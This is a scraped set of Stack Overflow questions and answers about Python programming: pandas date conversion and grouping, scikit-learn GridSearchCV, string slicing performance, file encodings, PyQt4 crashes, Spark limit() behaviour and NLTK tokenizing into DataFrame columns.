<p><code>normalize</code> just resets the time to midnight (according to <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.dt.normalize.html" rel="nofollow">the docs</a>).</p> <p>You can use <code>strftime</code> (see docs <a href="http://pandas.pydata.org/pandas-docs/version/0.17.0/generated/pandas.DatetimeIndex.strftime.html" rel="nofollow">here</a>). Also, <a href="https://docs.python.org/3.5/library/datetime.html#strftime-and-strptime-behavior" rel="nofollow">here</a> is a list of the format specifiers you can use.</p> <pre><code>ser = pd.to_timedelta(14487, unit='D') + pd.Timestamp('1960-1-1') ser.strftime('%Y-%m-%d') </code></pre> <p>outputs</p> <pre><code>'1999-08-31' </code></pre>
3
2016-08-01T23:44:13Z
[ "python", "pandas", "timestamp" ]
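The two answers combine into a short round trip from the SAS day count to a plain date string:

```python
import pandas as pd

sas_days = 14487  # SAS dates count days from 1960-01-01
ts = pd.Timestamp("1960-01-01") + pd.to_timedelta(sas_days, unit="D")

as_string = ts.strftime("%Y-%m-%d")   # formatted string
as_date = ts.date()                   # datetime.date object
```

Use `strftime` when a display string is enough, and `.date()` when later code needs a real date object.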
drop hour, min, sec from timestamp?
38,709,670
<p>I want to convert a date from sas, 14487, to 1999-08-31.</p> <p>How can I convert the current results '1999-08-31 00:00:00' to '1999-08-31'? I've tried ser.normalize(). But it doesn't help.</p> <pre><code>ser = pd.to_timedelta(14487, unit='D') + pd.Timestamp('1960-1-1') ser.normalize() </code></pre> <p>yield</p> <pre><code>Timestamp('1999-08-31 00:00:00') </code></pre>
2
2016-08-01T23:40:48Z
38,709,746
<p>If you want it in a datetime.date format:</p> <pre><code>(pd.to_timedelta(14487, unit='D') + pd.Timestamp('1960-1-1')).date() #Out: #datetime.date(1999, 8, 31) </code></pre>
3
2016-08-01T23:50:44Z
[ "python", "pandas", "timestamp" ]
Scikit-learn using GridSearchCV on DecisionTreeClassifier
38,709,690
<p>I tried to use GridSearchCV on DecisionTreeClassifier, but get the following error: TypeError: unbound method get_params() must be called with DecisionTreeClassifier instance as first argument (got nothing instead)</p> <p>here's my code: </p> <pre><code>from sklearn.tree import DecisionTreeClassifier, export_graphviz from sklearn.grid_search import GridSearchCV from sklearn.cross_validation import cross_val_score X, Y = createDataSet(filename) tree_para = {'criterion':['gini','entropy'],'max_depth':[4,5,6,7,8,9,10,11,12,15,20,30,40,50,70,90,120,150]} clf = GridSearchCV(DecisionTreeClassifier, tree_para, cv=5) clf.fit(X, Y) </code></pre>
1
2016-08-01T23:43:15Z
38,709,830
<p>In your call to <code>GridSearchCV</code> method, the first argument should be an instantiated object of the <code>DecisionTreeClassifier</code> instead of the name of the class. It should be</p> <pre><code>clf = GridSearchCV(DecisionTreeClassifier(), tree_para, cv=5) </code></pre> <p>Check out the example <a href="http://scikit-learn.org/stable/modules/generated/sklearn.grid_search.GridSearchCV.html" rel="nofollow">here</a> for more details.</p> <p>Hope that helps!</p>
1
2016-08-02T00:02:39Z
[ "python", "machine-learning", "scikit-learn" ]
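A runnable sketch of the corrected call on a toy dataset (note that in recent scikit-learn, `GridSearchCV` lives in `sklearn.model_selection` rather than the old `sklearn.grid_search` module used in the question):

```python
from sklearn.datasets import load_iris
from sklearn.model_selection import GridSearchCV
from sklearn.tree import DecisionTreeClassifier

X, y = load_iris(return_X_y=True)

tree_para = {"criterion": ["gini", "entropy"], "max_depth": [2, 4, 6]}
# pass an *instance*, DecisionTreeClassifier(), not the class itself
clf = GridSearchCV(DecisionTreeClassifier(random_state=0), tree_para, cv=3)
clf.fit(X, y)
```

After fitting, `clf.best_params_` and `clf.best_estimator_` hold the winning combination, which is what the unbound-method error was preventing in the original code.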
Remove characters in ranges from a string
38,709,711
<p>Curious to find if people can do much faster than my implementation (using pure python, or whatever, but then just for your sake).</p> <pre><code>sentence = "This is some example sentence where we remove parts" matches = [(5, 10), (13, 18), (22, 27), (38, 42)] </code></pre> <p>The goal is to remove within those ranges. E.g. the characters at indices (5, 6, 7, 8, 9) should be omitted in the return value for match (5, 10).</p> <p>My implementation:</p> <pre><code>def remove_matches(sentence, matches): new_s = '' lbound = 0 for l, h in matches: new_s += sentence[lbound:l] lbound = h new_s += sentence[matches[-1][1]:] return new_s </code></pre> <p>Result: <code>'This me le sce where weove parts'</code></p> <p>Note that the matches will never overlap, you can make use of that fact.</p> <p>Actually, my main question is simply: can we not do it somehow in some vectorized way? I'm sure that numpy could, but I doubt that would be more efficient in this case.</p> <p>Benchmarks:</p> <pre><code>PascalvKooten: 1000000 loops, best of 3: 1.34 µs per loop Ted Klein Bergman (1): 1000000 loops, best of 3: 1.59 µs per loop Ted Klein Bergman (2): 100000 loops, best of 3: 2.58 µs per loop Prune: 100000 loops, best of 3: 2.05 µs per loop njzk2: 100000 loops, best of 3: 3.19 µs per loop </code></pre>
1
2016-08-01T23:45:50Z
38,709,808
<pre><code>shortened = (sentence[:matches[0][0]]
             + "".join([sentence[matches[i-1][1]:matches[i][0]] for i in range(1, len(matches))])
             + sentence[matches[-1][1]:])
</code></pre> <p>Since I'm on my phone right now, I cannot debug, but it should work :D</p>
0
2016-08-01T23:59:39Z
[ "python", "optimization" ]
Remove characters in ranges from a string
38,709,711
<p>Curious to find if people can do much faster than my implementation (using pure python, or whatever, but then just for your sake).</p> <pre><code>sentence = "This is some example sentence where we remove parts"
matches = [(5, 10), (13, 18), (22, 27), (38, 42)]
</code></pre> <p>The goal is to remove the characters within those ranges. E.g. the characters at indices (5, 6, 7, 8, 9) should be omitted in the return value for match (5, 10).</p> <p>My implementation:</p> <pre><code>def remove_matches(sentence, matches):
    new_s = ''
    lbound = 0
    for l, h in matches:
        new_s += sentence[lbound:l]
        lbound = h
    new_s += sentence[matches[-1][1]:]
    return new_s
</code></pre> <p>Result: <code>'This me le sce where weove parts'</code></p> <p>Note that the matches will never overlap; you can make use of that fact.</p> <p>Actually, my main question is simply: can we not do it somehow in some vectorized way? I'm sure that numpy could, but I doubt that would be more efficient in this case.</p> <p>Benchmarks:</p> <pre><code>PascalvKooten:         1000000 loops, best of 3: 1.34 µs per loop
Ted Klein Bergman (1): 1000000 loops, best of 3: 1.59 µs per loop
Ted Klein Bergman (2): 100000 loops, best of 3: 2.58 µs per loop
Prune:                 100000 loops, best of 3: 2.05 µs per loop
njzk2:                 100000 loops, best of 3: 3.19 µs per loop
</code></pre>
1
2016-08-01T23:45:50Z
38,709,820
<p>If you append (None, 0) to the front and (len(sentence), None) to the back of matches</p> <pre><code>sentence = "This is some example sentence where we remove parts"
matches = [(None, 0), (5, 10), (13, 18), (22, 27), (38, 42), (len(sentence), None)]
</code></pre> <p>you can then write a join expression based on</p> <pre><code>matches[i][1]:matches[i+1][0] for i in range(len(matches)-1)
</code></pre> <p>Is that enough of a hint to move you along?</p>
0
2016-08-02T00:00:42Z
[ "python", "optimization" ]
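Prune's hint above can be turned into working code — a minimal sketch using sentinel pairs at both ends, so that every kept piece of text is the slice from the end of one match to the start of the next:

```python
sentence = "This is some example sentence where we remove parts"
matches = [(5, 10), (13, 18), (22, 27), (38, 42)]

def remove_matches(sentence, matches):
    # Sentinel "matches" bound the first and last kept slice.
    bounds = [(None, 0)] + list(matches) + [(len(sentence), None)]
    return "".join(sentence[bounds[i][1]:bounds[i + 1][0]]
                   for i in range(len(bounds) - 1))

print(remove_matches(sentence, matches))  # This me le sce where weove parts
```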
Remove characters in ranges from a string
38,709,711
<p>Curious to find if people can do much faster than my implementation (using pure python, or whatever, but then just for your sake).</p> <pre><code>sentence = "This is some example sentence where we remove parts"
matches = [(5, 10), (13, 18), (22, 27), (38, 42)]
</code></pre> <p>The goal is to remove the characters within those ranges. E.g. the characters at indices (5, 6, 7, 8, 9) should be omitted in the return value for match (5, 10).</p> <p>My implementation:</p> <pre><code>def remove_matches(sentence, matches):
    new_s = ''
    lbound = 0
    for l, h in matches:
        new_s += sentence[lbound:l]
        lbound = h
    new_s += sentence[matches[-1][1]:]
    return new_s
</code></pre> <p>Result: <code>'This me le sce where weove parts'</code></p> <p>Note that the matches will never overlap; you can make use of that fact.</p> <p>Actually, my main question is simply: can we not do it somehow in some vectorized way? I'm sure that numpy could, but I doubt that would be more efficient in this case.</p> <p>Benchmarks:</p> <pre><code>PascalvKooten:         1000000 loops, best of 3: 1.34 µs per loop
Ted Klein Bergman (1): 1000000 loops, best of 3: 1.59 µs per loop
Ted Klein Bergman (2): 100000 loops, best of 3: 2.58 µs per loop
Prune:                 100000 loops, best of 3: 2.05 µs per loop
njzk2:                 100000 loops, best of 3: 3.19 µs per loop
</code></pre>
1
2016-08-01T23:45:50Z
38,710,164
<p>This might be faster. It's basically your solution but with a list instead of strings. Since the list is mutable and doesn't need to be re-created every loop, it should be quite a bit faster (maybe not for so few matches, though).</p> <pre><code>sentence = "This is some example sentence where we remove parts"
matches = [(5, 10), (13, 18), (22, 27), (38, 42)]

def remove_matches(sentence, matches):
    result = []
    i = 0
    for x, y in matches:
        result.append(sentence[i:x])
        i = y
    result.append(sentence[i:])
    return "".join(result)
</code></pre> <p>Otherwise, this method might be quicker:</p> <pre><code>def remove_matches(sentence, matches):
    return "".join(
        [sentence[0:matches[i][0]] if i == 0
         else sentence[matches[i - 1][1]:matches[i][0]] if i != len(matches)
         else sentence[matches[i - 1][1]::]
         for i in range(len(matches) + 1)
        ])
</code></pre>
1
2016-08-02T00:45:26Z
[ "python", "optimization" ]
Remove characters in ranges from a string
38,709,711
<p>Curious to find if people can do much faster than my implementation (using pure python, or whatever, but then just for your sake).</p> <pre><code>sentence = "This is some example sentence where we remove parts"
matches = [(5, 10), (13, 18), (22, 27), (38, 42)]
</code></pre> <p>The goal is to remove the characters within those ranges. E.g. the characters at indices (5, 6, 7, 8, 9) should be omitted in the return value for match (5, 10).</p> <p>My implementation:</p> <pre><code>def remove_matches(sentence, matches):
    new_s = ''
    lbound = 0
    for l, h in matches:
        new_s += sentence[lbound:l]
        lbound = h
    new_s += sentence[matches[-1][1]:]
    return new_s
</code></pre> <p>Result: <code>'This me le sce where weove parts'</code></p> <p>Note that the matches will never overlap; you can make use of that fact.</p> <p>Actually, my main question is simply: can we not do it somehow in some vectorized way? I'm sure that numpy could, but I doubt that would be more efficient in this case.</p> <p>Benchmarks:</p> <pre><code>PascalvKooten:         1000000 loops, best of 3: 1.34 µs per loop
Ted Klein Bergman (1): 1000000 loops, best of 3: 1.59 µs per loop
Ted Klein Bergman (2): 100000 loops, best of 3: 2.58 µs per loop
Prune:                 100000 loops, best of 3: 2.05 µs per loop
njzk2:                 100000 loops, best of 3: 3.19 µs per loop
</code></pre>
1
2016-08-01T23:45:50Z
38,717,333
<p>Had the strings been mutable, a fast solution would have been possible by moving the kept characters in place, one contiguous substring at a time.</p> <p>An optimal C solution would consist of a few memmove calls.</p>
0
2016-08-02T09:59:33Z
[ "python", "optimization" ]
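The in-place idea from the answer above can be sketched in Python with a <code>bytearray</code>, which is mutable: each kept span is copied toward the front of the buffer (the analogue of the memmove calls) and the leftover tail is truncated. This only illustrates the technique; it is not claimed to beat the benchmarked solutions.

```python
sentence = "This is some example sentence where we remove parts"
matches = [(5, 10), (13, 18), (22, 27), (38, 42)]

def remove_matches_inplace(buf, matches):
    # buf is a bytearray; compact the kept spans toward the front.
    write = read = 0
    for lo, hi in matches:
        n = lo - read
        buf[write:write + n] = buf[read:lo]  # analogue of a memmove call
        write += n
        read = hi
    tail = len(buf) - read
    buf[write:write + tail] = buf[read:]
    del buf[write + tail:]                   # truncate the leftover bytes

buf = bytearray(sentence, "ascii")
remove_matches_inplace(buf, matches)
print(buf.decode("ascii"))  # This me le sce where weove parts
```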
Remove characters in ranges from a string
38,709,711
<p>Curious to find if people can do much faster than my implementation (using pure python, or whatever, but then just for your sake).</p> <pre><code>sentence = "This is some example sentence where we remove parts"
matches = [(5, 10), (13, 18), (22, 27), (38, 42)]
</code></pre> <p>The goal is to remove the characters within those ranges. E.g. the characters at indices (5, 6, 7, 8, 9) should be omitted in the return value for match (5, 10).</p> <p>My implementation:</p> <pre><code>def remove_matches(sentence, matches):
    new_s = ''
    lbound = 0
    for l, h in matches:
        new_s += sentence[lbound:l]
        lbound = h
    new_s += sentence[matches[-1][1]:]
    return new_s
</code></pre> <p>Result: <code>'This me le sce where weove parts'</code></p> <p>Note that the matches will never overlap; you can make use of that fact.</p> <p>Actually, my main question is simply: can we not do it somehow in some vectorized way? I'm sure that numpy could, but I doubt that would be more efficient in this case.</p> <p>Benchmarks:</p> <pre><code>PascalvKooten:         1000000 loops, best of 3: 1.34 µs per loop
Ted Klein Bergman (1): 1000000 loops, best of 3: 1.59 µs per loop
Ted Klein Bergman (2): 100000 loops, best of 3: 2.58 µs per loop
Prune:                 100000 loops, best of 3: 2.05 µs per loop
njzk2:                 100000 loops, best of 3: 3.19 µs per loop
</code></pre>
1
2016-08-01T23:45:50Z
38,727,550
<p>Instead of removing characters, I would define how to keep them, to make the manipulation easier:</p> <pre><code>sentence = "This is some example sentence where we remove parts" matches = [(5, 10), (13, 18), (22, 27), (38, 42)] chain = (None,) + sum(matches, ()) + (None,) # keep = ((m1, m2) for m1, m2 in zip(chain[::2], chain[1::2])) # list(keep) = [(None, 5), (10, 13), (18, 22), (27, 38), (42, None)] # or, keep = ((m1[1], m2[0]) for m1, m2 in zip([(None, None)] + matches, matches + [(None, None)])) return ''.join(sentence[x:y] for x, y in keep) </code></pre>
0
2016-08-02T18:03:16Z
[ "python", "optimization" ]
Python read non-ascii text file
38,709,789
<p>I am trying to load a text file, which contains some German letters, with</p> <pre><code>content=open("file.txt","r").read()
</code></pre> <p>which results in this error message</p> <pre><code>UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 26: ordinal not in range(128)
</code></pre> <p>If I modify the file to contain only ASCII characters, everything works as expected.</p> <p>Apparently, using</p> <pre><code>content=open("file.txt","rb").read()
</code></pre> <p>or</p> <pre><code>content=open("file.txt","r",encoding="utf-8").read()
</code></pre> <p>both do the job.</p> <p>Why is it possible to read with "binary" mode and get the same result as with utf-8 encoding?</p>
1
2016-08-01T23:56:51Z
38,709,816
<p>In Python 3, using 'r' mode without specifying an encoding falls back to the platform's default encoding (the result of <code>locale.getpreferredencoding()</code>), which on your system is ASCII. Using 'rb' mode reads the file as bytes and makes no attempt to interpret it as a string of characters.</p>
3
2016-08-02T00:00:28Z
[ "python", "utf-8" ]
Python read non-ascii text file
38,709,789
<p>I am trying to load a text file, which contains some German letters, with</p> <pre><code>content=open("file.txt","r").read()
</code></pre> <p>which results in this error message</p> <pre><code>UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 26: ordinal not in range(128)
</code></pre> <p>If I modify the file to contain only ASCII characters, everything works as expected.</p> <p>Apparently, using</p> <pre><code>content=open("file.txt","rb").read()
</code></pre> <p>or</p> <pre><code>content=open("file.txt","r",encoding="utf-8").read()
</code></pre> <p>both do the job.</p> <p>Why is it possible to read with "binary" mode and get the same result as with utf-8 encoding?</p>
1
2016-08-01T23:56:51Z
38,709,942
<p>ASCII is limited to characters in the range [0,128). If you try to decode a byte outside that range, you get that error.</p> <p>When you read the file in as bytes, you're "widening" the acceptable range of characters to [0,256). So your <code>0xc3</code> byte (<code>Ã</code> in Latin-1) is now read in without error. But despite it seeming to work, it's still not "correct".</p> <p>If your strings are indeed unicode encoded, then the possibility exists that one will contain a multibyte character, that is, a character whose byte representation actually spans multiple bytes.</p> <p>It is in this case that the difference between reading a file as a byte string and properly decoding it becomes quite apparent.</p> <p>A character like this: č</p> <p>will be read in as two bytes but, properly decoded, is one character:</p> <pre><code>b = bytes('č', encoding='utf-8')
print(len(b))                  # 2
print(len(b.decode('utf-8')))  # 1
</code></pre>
2
2016-08-02T00:18:09Z
[ "python", "utf-8" ]
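The byte <code>0xc3</code> in the asker's traceback ties directly to the explanation above: it is the UTF-8 lead byte of the German umlauts. A small self-contained sketch (writing a temporary file instead of the asker's <code>file.txt</code>):

```python
import os
import tempfile

fd, path = tempfile.mkstemp()
os.close(fd)
with open(path, "w", encoding="utf-8") as f:
    f.write("Grüße")  # German word with two non-ASCII letters

with open(path, "rb") as f:
    raw = f.read()   # bytes: no decoding happens at all
with open(path, "r", encoding="utf-8") as f:
    text = f.read()  # str: each two-byte sequence becomes one character

print(raw)                  # b'Gr\xc3\xbc\xc3\x9fe' -- note the 0xc3 lead bytes
print(len(raw), len(text))  # 7 5
os.remove(path)
```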
Pandas dataframe values refuse to be evaluated as floats with `.apply(eval)`. Why?
38,709,791
<p>Using Python 3.4, I have a Pandas Dataframe</p> <pre><code>import pandas as pd df = pd.read_csv('file.csv') df.head() </code></pre> <p>giving</p> <pre><code> animal fraction_decimal 0 cat1 '2/7' 1 cat2 '4/55' 2 cat3 '22/195' 3 cat4 '6/13' .... </code></pre> <p>I would like to evaluate the values in column <code>fraction_decimal</code> to become floats, i.e. </p> <pre><code> animal fraction_decimal 0 cat1 0.2857142857142857 1 cat2 0.07272727272727272 2 cat3 0.11282051282051282 3 cat4 0.46153846153846156 .... </code></pre> <p>However, using <code>.apply(eval)</code> simply doesn't work. </p> <p>I tried</p> <pre><code>df['fraction_decimal'].apply(eval) </code></pre> <p>but this outputs:</p> <pre><code>0 2/7 1 4/55 2 22/195 3 6/13 .... Name: fraction_decimal, dtype: object </code></pre> <p>Why doesn't this work? How can this work properly? </p>
2
2016-08-01T23:57:07Z
38,709,838
<pre><code>eval("4/2")
2.0
</code></pre> <hr> <pre><code>eval("'4/2'")
'4/2'
</code></pre> <hr> <pre><code>eval(eval("'4/2'"))
2.0
</code></pre> <p>You have quote characters in your strings. You need to strip them out.</p> <p>Consider:</p> <pre><code>s = pd.Series(["'1/2'", "'3/4'", "'4/5'", "'6+5'", "'11-7'", "'9*10'"])
</code></pre> <p>Then:</p> <pre><code>s.str.replace(r'[\'\"]', '').apply(eval)

0     0.50
1     0.75
2     0.80
3    11.00
4     4.00
5    90.00
dtype: float64
</code></pre>
2
2016-08-02T00:03:31Z
[ "python", "python-3.x", "pandas" ]
Python 2.7 crashes when importing PyQt4.QtDeclarative or PyQt4.Qt on Ubuntu
38,709,817
<p>Some time ago (months?) the program <code>rqt_plot</code> started crashing on startup (SIGSEGV) on my machine. I finally tracked it down a little deeper and found that the problem occurs while python is trying to import <code>PyQt4.QtDeclarative</code>. Unfortunately I don't remember when this started happening, and my Internet searches have turned up nothing. Any ideas what's going wrong? I suspect an incompatible package update somewhere along the way, but have no idea how to find the root cause.</p> <p>Here's a simple session transcript:</p> <pre><code>$ python Python 2.7.6 (default, Jun 22 2015, 17:58:13) [GCC 4.8.2] on linux2 Type "help", "copyright", "credits" or "license" for more information. &gt;&gt;&gt; from PyQt4 import QtDeclarative Segmentation fault (core dumped) $ </code></pre> <p>Here's some system information:</p> <pre><code>$ uname -a Linux [HOSTNAME] 3.13.0-63-generic #103-Ubuntu SMP Fri Aug 14 21:42:59 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux $ echo $PYTHONPATH $ which python /usr/bin/python $ ls -l /usr/bin/python lrwxrwxrwx 1 root root 9 Jan 8 2015 /usr/bin/python -&gt; python2.7 </code></pre> <p>Follow-up:</p> <p>I found later that I had the same problem (Segmentation fault) when doing <code>import PyQt4.Qt</code> as well.</p>
1
2016-08-02T00:00:29Z
39,111,262
<p>It can be difficult to diagnose a segfault when the only error message is</p> <pre><code>Segmentation fault (core dumped) </code></pre> <p>In this case, because reinstallation of <code>python-qt4</code> does not take much time at all, I would recommend you do it by running:</p> <pre><code>sudo apt-get install --reinstall python-qt4 </code></pre> <p>Edit: It looks like OP encountered another segfault when doing <code>import PyQt4.Qt</code>. This is probably related to <code>python-sip</code>, which is a dependency of <code>python-pyqt4</code>. To get rid of the segfault, reinstall <code>python-sip</code> by running:</p> <pre><code>sudo apt-get install --reinstall python-sip </code></pre>
1
2016-08-23T21:53:03Z
[ "python", "ubuntu", "pyqt4", "python-sip", "qtdeclarative" ]
Syntax error when defining 2 functions in python
38,709,931
<p>I've <em>very</em> new to programming so sorry if this is a stupid question, but I'm trying to make a program with multiple functions, but whenever I attempt to define one it comes up with an error.</p> <pre><code>def startUp(): promptName() def promptName(): name = input("Hello. Please enter your name: ") startUp() SyntaxError: invalid syntax </code></pre> <p>If it helps the def part in def promptName(): is highlighted red.</p>
1
2016-08-02T00:17:04Z
38,710,002
<p>The code you posted here is absolutely fine as far as the syntax goes. Please check whether you have forgotten a colon or similar in your original code.</p> <p>Regarding the code: if you define a variable (like <code>name</code> within <code>promptName()</code>) inside a function, you cannot access that variable from outside the function. To make use of it, you have to return it or explicitly declare it as a global variable.</p>
1
2016-08-02T00:24:45Z
[ "python" ]
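To make the scoping point above concrete — a hedged sketch in which the prompt-reading function is made injectable, so it can be demonstrated without typing at the console (the <code>reader</code> parameter is an addition for illustration, not part of the asker's code):

```python
def prompt_name(reader=input):
    # reader defaults to the builtin input(), but can be swapped out
    return reader("Hello. Please enter your name: ")

def start_up(reader=input):
    # the value must be *returned* by prompt_name to be usable here;
    # a name assigned inside prompt_name is invisible from this scope
    name = prompt_name(reader)
    return "Welcome, " + name

# Simulate a user typing "Ada" instead of blocking on stdin:
print(start_up(lambda prompt: "Ada"))  # Welcome, Ada
```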
Syntax error when defining 2 functions in python
38,709,931
<p>I've <em>very</em> new to programming so sorry if this is a stupid question, but I'm trying to make a program with multiple functions, but whenever I attempt to define one it comes up with an error.</p> <pre><code>def startUp(): promptName() def promptName(): name = input("Hello. Please enter your name: ") startUp() SyntaxError: invalid syntax </code></pre> <p>If it helps the def part in def promptName(): is highlighted red.</p>
1
2016-08-02T00:17:04Z
38,710,047
<p>I'd bet you're trying to paste the entire thing into a Python interpreter session. The command line interpreter needs things entered one block at a time, so try pasting the <code>startUp</code> function, hit enter, then <code>promptName</code> and enter, and then run the whole thing with the last line.</p> <p>Alternatively, save it all as a .py file and run the file.</p>
5
2016-08-02T00:30:10Z
[ "python" ]
Group by hours and plot in Bokeh
38,709,991
<p>I am trying to get a plot like a stock data in Bokeh like in the link <a href="http://bokeh.pydata.org/en/latest/docs/gallery/stocks.html" rel="nofollow">http://bokeh.pydata.org/en/latest/docs/gallery/stocks.html</a></p> <pre><code>2004-01-05,00:00:00,01:00:00,Mon,20504,792 2004-01-05,01:00:00,02:00:00,Mon,16553,783 2004-01-05,02:00:00,03:00:00,Mon,18944,790 2004-01-05,03:00:00,04:00:00,Mon,17534,750 2004-01-06,00:00:00,01:00:00,Tue,17262,747 2004-01-06,01:00:00,02:00:00,Tue,19072,777 2004-01-06,02:00:00,03:00:00,Tue,18275,785 </code></pre> <p>I want to use column 2:startTime and 5:count and I want to group by column <code>day</code> and sum the <code>counts</code> in respective hours. </p> <p>code: Does not give the output </p> <pre><code>import numpy as np import pandas as pd #from bokeh.layouts import gridplot from bokeh.plotting import figure, show, output_file data = pd.read_csv('one_hour.csv') data.column = ['date', 'startTime', 'endTime', 'day', 'count', 'unique'] p1 = figure(x_axis_type='startTime', y_axis_type='count', title="counts per hour") p1.grid.grid_line_alpha=0.3 p1.xaxis.axis_label = 'startTime' p1.yaxis.axis_label = 'count' output_file("count.html", title="time_graph.py") show(gridplot([[p1]], plot_width=400, plot_height=400)) # open a browser </code></pre> <p>Reading the column and plot isn't any problem but applying group by and sum operations on the column data is something I am not able to perform. </p> <p>Appreciate the help, Thanks ! </p>
0
2016-08-02T00:23:50Z
38,710,974
<p>Sounds like this is what you need:</p> <pre><code>data.groupby('startTime')['count'].sum() </code></pre> <p>Output:</p> <pre><code>00:00:00 37766 01:00:00 35625 02:00:00 37219 03:00:00 17534 </code></pre>
1
2016-08-02T02:39:00Z
[ "python", "pandas", "plot", "graph", "bokeh" ]
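The one-liner above can be checked against the sample rows from the question — a minimal sketch that rebuilds the two relevant columns by hand instead of reading the asker's <code>one_hour.csv</code>:

```python
import pandas as pd

data = pd.DataFrame({
    "startTime": ["00:00:00", "01:00:00", "02:00:00", "03:00:00",
                  "00:00:00", "01:00:00", "02:00:00"],
    "count":     [20504, 16553, 18944, 17534, 17262, 19072, 18275],
})

# Sum the counts within each hour bucket.
hourly = data.groupby("startTime")["count"].sum()
print(hourly)
```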
Towards limiting the big RDD
38,710,018
<p>I am reading many images and I would like to work on a tiny subset of them for development. As a result I am trying to understand how <a href="/questions/tagged/spark" class="post-tag" title="show questions tagged &#39;spark&#39;" rel="tag">spark</a> and <a href="/questions/tagged/python" class="post-tag" title="show questions tagged &#39;python&#39;" rel="tag">python</a> could make that happen:</p> <pre><code>In [1]: d = sqlContext.read.parquet('foo')

In [2]: d.map(lambda x: x.photo_id).first()
Out[2]: u'28605'

In [3]: d.limit(1).map(lambda x: x.photo_id)
Out[3]: PythonRDD[31] at RDD at PythonRDD.scala:43

In [4]: d.limit(1).map(lambda x: x.photo_id).first()
// still running...
</code></pre> <p>...so what is happening? I would expect the <a href="https://spark.apache.org/docs/latest/api/python/pyspark.sql.html?highlight=limit#pyspark.sql.DataFrame.limit" rel="nofollow">limit()</a> call to run much faster than what we had in <code>[2]</code>, but that's not the case<sup>*</sup>.</p> <p>Below I will describe my understanding; please correct me, since obviously I am missing something:</p> <ol> <li><p><code>d</code> is an RDD of pairs (I know that from the schema) and with the map function I am saying: </p> <p>i) Take every pair (which will be named <code>x</code>) and give me back the <code>photo_id</code> attribute.</p> <p>ii) That will result in a new (anonymous) RDD, on which we are applying the <code>first()</code> method, which I am not sure how it works<sup>$</sup>, but it should give me the first element of that anonymous RDD.</p></li> <li><p>In <code>[3]</code>, we limit the <code>d</code> RDD to 1, which means that even though <code>d</code> has many elements, only 1 is used, and the map function is applied to that one element only. 
The <code>Out [3]</code> should be the RDD created by the mapping.</p></li> <li>In <code>[4]</code>, I would expect to follow the logic of <code>[3]</code> and just print the one and only element of the limited RDD...</li> </ol> <hr> <p>As expected, after looking at the monitor, [4] seems to process the <strong>whole dataset</strong>, while the others aren't, so it seems that I am not using <code>limit()</code> correctly, or that that's not what am I looking for:</p> <p><a href="http://i.stack.imgur.com/VvGZ3.png" rel="nofollow"><img src="http://i.stack.imgur.com/VvGZ3.png" alt="enter image description here"></a></p> <hr> <p>Edit:</p> <pre><code>tiny_d = d.limit(1).map(lambda x: x.photo_id) tiny_d.map(lambda x: x.photo_id).first() </code></pre> <p>The first will give a <code>PipelinedRDD</code>, which as described <a href="http://billchambers.me/tutorials/2014/12/06/getting-started-with-apache-spark.html" rel="nofollow">here</a>, it will not actually do any <em>action</em>, just a transformation.</p> <p>However, the second line will also process the whole dataset (as a matter of fact, the number of Tasks now are as many as before, plus one!).</p> <hr> <p>*<sub>[2] executed instantly, while [4] is still running and >3h have passed..</sub></p> <p>$<sub>I couldn't find it in the documentation, because of the name.</sub></p>
3
2016-08-02T00:26:30Z
38,758,582
<p>Based on your code, here is a simpler test case on Spark 2.0</p> <pre><code>case class my (x: Int)
val rdd = sc.parallelize(0.until(10000), 1000).map { x =&gt; my(x) }
val df1 = spark.createDataFrame(rdd)
val df2 = df1.limit(1)
df1.map { r =&gt; r.getAs[Int](0) }.first
df2.map { r =&gt; r.getAs[Int](0) }.first // Much slower than the previous line
</code></pre> <p>Actually, Dataset.first is equivalent to Dataset.limit(1).collect, so check the physical plan of the two cases:</p> <pre><code>scala&gt; df1.map { r =&gt; r.getAs[Int](0) }.limit(1).explain
== Physical Plan ==
CollectLimit 1
+- *SerializeFromObject [input[0, int, true] AS value#124]
   +- *MapElements &lt;function1&gt;, obj#123: int
      +- *DeserializeToObject createexternalrow(x#74, StructField(x,IntegerType,false)), obj#122: org.apache.spark.sql.Row
         +- Scan ExistingRDD[x#74]

scala&gt; df2.map { r =&gt; r.getAs[Int](0) }.limit(1).explain
== Physical Plan ==
CollectLimit 1
+- *SerializeFromObject [input[0, int, true] AS value#131]
   +- *MapElements &lt;function1&gt;, obj#130: int
      +- *DeserializeToObject createexternalrow(x#74, StructField(x,IntegerType,false)), obj#129: org.apache.spark.sql.Row
         +- *GlobalLimit 1
            +- Exchange SinglePartition
               +- *LocalLimit 1
                  +- Scan ExistingRDD[x#74]
</code></pre> <p>For the first case, it is related to an optimisation in the CollectLimitExec physical operator. That is, it will first fetch the first partition to get the limit number of rows, 1 in this case, and if that is not satisfied, it fetches more partitions until the desired limit is reached. So generally, if the first partition is not empty, only the first partition will be calculated and fetched. The other partitions will not even be computed.</p> <p>However, in the second case, the optimisation in the CollectLimitExec does not help, because the previous limit operation involves a shuffle operation. 
All partitions will be computed, with LocalLimit(1) run on each partition to get 1 row, and then all partitions are shuffled into a single partition. CollectLimitExec will fetch 1 row from the resulting single partition.</p>
3
2016-08-04T04:38:56Z
[ "python", "hadoop", "apache-spark", "pyspark", "distributed-computing" ]
Storing list in a pandas DataFrame column
38,710,061
<p>I am trying to do some text processing using NLTK and Pandas. </p> <p>I have DataFrame with column 'text'. I want to add column 'text_tokenized' that will be stored as a nested list.</p> <p>My code for tokenizing text is: </p> <pre><code>def sent_word_tokenize(text): text = unicode(text, errors='replace') sents = sent_tokenize(text) tokens = map(word_tokenize, sents) return tokens </code></pre> <p>Currently, I am trying to apply this function as following:</p> <pre><code>df['text_tokenized'] = df.apply(lambda row: sent_word_tokenize(row.text), axis=1) </code></pre> <p>Which gives me error:</p> <pre><code>ValueError: Shape of passed values is (100, 3), indices imply (100, 21) </code></pre> <p>Not sure how to fix it and what is wrong here.</p>
0
2016-08-02T00:32:33Z
38,711,386
<p>Solved my own question by using a different axis:</p> <p>Instead of:</p> <pre><code>df['text_tokenized'] = df.apply(lambda row: sent_word_tokenize(row.text), axis=1)
</code></pre> <p>I used:</p> <pre><code>df['text_tokenized'] = df.text.apply(lambda text: sent_word_tokenize(text))
</code></pre> <p>Although I am not sure why it works, and I would really appreciate it if somebody could explain it to me. </p>
0
2016-08-02T03:38:45Z
[ "python", "pandas", "dataframe", "nlp", "nltk" ]
